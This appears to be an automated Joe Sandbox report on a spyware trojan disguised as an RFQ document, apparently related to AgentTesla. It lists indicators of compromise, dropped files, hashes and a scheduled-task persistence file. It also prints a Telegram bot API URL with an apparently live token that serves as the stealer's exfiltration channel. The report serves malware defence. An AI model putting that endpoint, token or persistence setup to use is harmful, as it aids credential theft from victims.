                        http://api.telegram.orgRFQ-101432620247fl#U00e2#U00aexslx.exe, 00000009.00000002.3268439480.000000000327D000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3268715008.0000000002D1D000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2063886948.00000000028CA000.00000004.00000800.00020000.00000000.sdmp, RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000009.00000002.3268439480.000000000326A000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 0000000A.00000002.2102960401.00000000030DA000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3268715008.0000000002D0A000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.chiark.greenend.org.uk/~sgtatham/putty/0RFQ-101432620247fl#U00e2#U00aexslx.exe, ywKDUBCUA.exe.0.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://api.telegram.org/bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2064422472.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000009.00000002.3268439480.0000000003211000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3264244060.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3268715008.0000000002CB1000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        149.154.167.220
                        		api.telegram.orgUnited Kingdom
                        		62041TELEGRAMRUtrue

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1445865
                        Start date and time:2024-05-22 17:26:04 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 33s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:20
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:RFQ-101432620247fl#U00e2#U00aexslx.exe
                        renamed because original name is a hash value
                        Original Sample Name:RFQ-101432620247flxslx.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@23/15@1/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 152
                        • Number of non-executed functions: 13
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • VT rate limit hit for: RFQ-101432620247fl#U00e2#U00aexslx.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        11:26:53API Interceptor1774726x Sleep call for process: RFQ-101432620247fl#U00e2#U00aexslx.exe modified
                        11:26:54API Interceptor47x Sleep call for process: powershell.exe modified
                        11:26:57API Interceptor1031314x Sleep call for process: ywKDUBCUA.exe modified
                        17:26:55Task SchedulerRun new task: ywKDUBCUA path: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        149.154.167.220QUOTATION SHEET_RFQ 564077 2024.5.17.exeGet hashmaliciousAgentTeslaBrowse
                          MSK203.exeGet hashmaliciousGuLoaderBrowse
                            New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                              gtKVgxrJ22.exeGet hashmaliciousGurcu Stealer, WhiteSnake StealerBrowse
                                Pg5dhIO92K.exeGet hashmaliciousAgentTeslaBrowse
                                  Shipping Reference_AWB 703280542_INVOICE_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                    4289397_SEA SHIPMENT.exeGet hashmaliciousAgentTeslaBrowse
                                      PAYMENT COPY 02521.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                                        ERsg2wzaD4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          Yehir Hastanesi scan00100_PDF.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            api.telegram.orgQUOTATION SHEET_RFQ 564077 2024.5.17.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            MSK203.exeGet hashmaliciousGuLoaderBrowse
                                            • 149.154.167.220
                                            New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                            • 149.154.167.220
                                            gtKVgxrJ22.exeGet hashmaliciousGurcu Stealer, WhiteSnake StealerBrowse
                                            • 149.154.167.220
                                            Pg5dhIO92K.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            Shipping Reference_AWB 703280542_INVOICE_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            4289397_SEA SHIPMENT.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            PAYMENT COPY 02521.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                                            • 149.154.167.220
                                            ERsg2wzaD4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            • 149.154.167.220
                                            Yehir Hastanesi scan00100_PDF.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                            • 149.154.167.220

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            TELEGRAMRUQUOTATION SHEET_RFQ 564077 2024.5.17.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            MSK203.exeGet hashmaliciousGuLoaderBrowse
                                            • 149.154.167.220
                                            New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                            • 149.154.167.220
                                            https://scandal-lucah-melayu-viral.group-telegram.my.id/Get hashmaliciousUnknownBrowse
                                            • 149.154.167.99
                                            https://danakaget.uniclodw.web.id/Get hashmaliciousUnknownBrowse
                                            • 149.154.164.13
                                            https://teiegeram-hk.com/Get hashmaliciousUnknownBrowse
                                            • 149.154.167.99
                                            gtKVgxrJ22.exeGet hashmaliciousGurcu Stealer, WhiteSnake StealerBrowse
                                            • 149.154.167.220
                                            https://rentry.co/webitokt/rawGet hashmaliciousUnknownBrowse
                                            • 149.154.167.99
                                            Pg5dhIO92K.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            Shipping Reference_AWB 703280542_INVOICE_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            3b5074b1b5d032e5620f69f9f700ff0eSOA_41457.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            QUOTATION SHEET_RFQ 564077 2024.5.17.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            INSTALLATION BOQ KATSINA.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            https://www.google.com.bh/url?hl=en&q=https://www.google.com.bh/url?hl%3Den%26q%3Dhttp://www.google.com/amp/www.google.com/amp/www.google.com/amp/%252574%252569%25256E%252579%252575%252572%25256C%25252E%252563%25256F%25256D%25252F%25256D%252576%252574%252575%252575%252566%252537%252533%26source%3Dgmail%26ust%3D1716286979743000%26usg%3DAOvVaw0kIG15Hao_4RLWdhQSbrTj&source=gmail&ust=1716287016979000&usg=AOvVaw2OvZXU7t2_QCy0TjxskKGnGet hashmaliciousUnknownBrowse
                                            • 149.154.167.220
                                            New Order.exeGet hashmaliciousUnknownBrowse
                                            • 149.154.167.220
                                            New Order.exeGet hashmaliciousUnknownBrowse
                                            • 149.154.167.220
                                            http://twomancake.comGet hashmaliciousUnknownBrowse
                                            • 149.154.167.220
                                            Doc1000050789.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 149.154.167.220
                                            https://zoomzle.comGet hashmaliciousUnknownBrowse
                                            • 149.154.167.220
                                            rSipari__PO408232023_ZNG__stanbul_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ-101432620247fl#U00e2#U00aexslx.exe.log

                                            Download File
                                            Process:C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1415
                                            Entropy (8bit):5.352427679901606
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
                                            MD5:3978978DE913FD1C068312697D6E5917
                                            SHA1:1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
                                            SHA-256:33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
                                            SHA-512:78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ywKDUBCUA.exe.log

                                            Download File
                                            Process:C:\Users\user\AppData\Roaming\ywKDUBCUA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1415
                                            Entropy (8bit):5.352427679901606
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
                                            MD5:3978978DE913FD1C068312697D6E5917
                                            SHA1:1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
                                            SHA-256:33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
                                            SHA-512:78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):2232
                                            Entropy (8bit):5.380747059108785
                                            Encrypted:false
                                            SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//MPUyus:lGLHxvIIwLgZ2KRHWLOugss
                                            MD5:B9CC5EFE1FBFE7397745E31421CA5C07
                                            SHA1:604EEA678D7007BA23FBC85A5A550F4596B1ACCB
                                            SHA-256:0005DDD738AFA412C3B0ACB08186879CF788634D076242DC9DA13EC595EB7775
                                            SHA-512:CB9B6917A2A94C8AB476C4F4547284F7BB81A2F8AA8E75C8982E277A3F78F6D2408FDC82BEBD9C5EC56ADB8C2C1C1D9DE7A0F51285D86D39C74415A6D2508FA3
                                            Malicious:false
                                            Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2zrixhwo.o0a.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_53jam2fg.fk2.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5d3wf5yg.gfv.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cwdgkiem.2ke.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2ffljvw.hrm.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rtht3cui.0l0.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vr4bb4ry.n0g.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ze1cemh5.psb.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\tmp9347.tmp

                                            Download File
                                            Process:C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1582
                                            Entropy (8bit):5.108523968555501
                                            Encrypted:false
                                            SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtZxvn:cgergYrFdOFzOzN33ODOiDdKrsuTPv
                                            MD5:F74479BA23197628839C67A71C1068FC
                                            SHA1:27E80B3E9F1F0ACD52709A9A1C6B68DBC06FFDBE
                                            SHA-256:C054F245E4AD46B910C3157CA0D353E2DCD3D98B046B56074ECEE00552BB4417
                                            SHA-512:0BBF39B949C0A188F87E69640AE620A2DEE76498AF799BB10E53BBA727101726CD83EF8004FFC8666808586E2605B5C57229F213272CE5ADABCA24217171EFD4
                                            Malicious:true
                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                            C:\Users\user\AppData\Local\Temp\tmpA374.tmp

                                            Download File
                                            Process:C:\Users\user\AppData\Roaming\ywKDUBCUA.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1582
                                            Entropy (8bit):5.108523968555501
                                            Encrypted:false
                                            SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtZxvn:cgergYrFdOFzOzN33ODOiDdKrsuTPv
                                            MD5:F74479BA23197628839C67A71C1068FC
                                            SHA1:27E80B3E9F1F0ACD52709A9A1C6B68DBC06FFDBE
                                            SHA-256:C054F245E4AD46B910C3157CA0D353E2DCD3D98B046B56074ECEE00552BB4417
                                            SHA-512:0BBF39B949C0A188F87E69640AE620A2DEE76498AF799BB10E53BBA727101726CD83EF8004FFC8666808586E2605B5C57229F213272CE5ADABCA24217171EFD4
                                            Malicious:false
                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                            C:\Users\user\AppData\Roaming\ywKDUBCUA.exe

                                            Download File
                                            Process:C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):767496
                                            Entropy (8bit):7.773686109262418
                                            Encrypted:false
                                            SSDEEP:12288:6PoO3mXWQxhFtF1aTxk/THYL9zkFSr1amot3ScRjg6GeJq5k4mvp9QtmYJn3KSrZ:6To/xhHHadkLHSaDLXGJmvpWtxJlrk0
                                            MD5:626130B6E15538C11F7C38C2FE4A6039
                                            SHA1:706CA5AC781496076D1604536B9CE10AC1F62EE1
                                            SHA-256:B89D6BE0BCFB915492BEB7AE726F815DCF289A284E650C200BDA4FAF5DB60FA1
                                            SHA-512:2C27353EA0BC04CD0B015DCCD340749EA4D91C58AB249CFA30B7BC5C546A76D85F6D096E650D64C3CD891F1D75B92FE93F67961B93ECD890A86C877032572024
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 83%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....I.f..............0......p.......+... ...@....@.. ....................................@..................................*..O....@...i...............6........................................................... ............... ..H............text........ ...................... ..`.rsrc....i...@...l..................@..@.reloc...............|..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Roaming\ywKDUBCUA.exe:Zone.Identifier

                                            Download File
                                            Process:C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:false
                                            Preview:[ZoneTransfer]....ZoneId=0

                                            Static File Info

                                            General

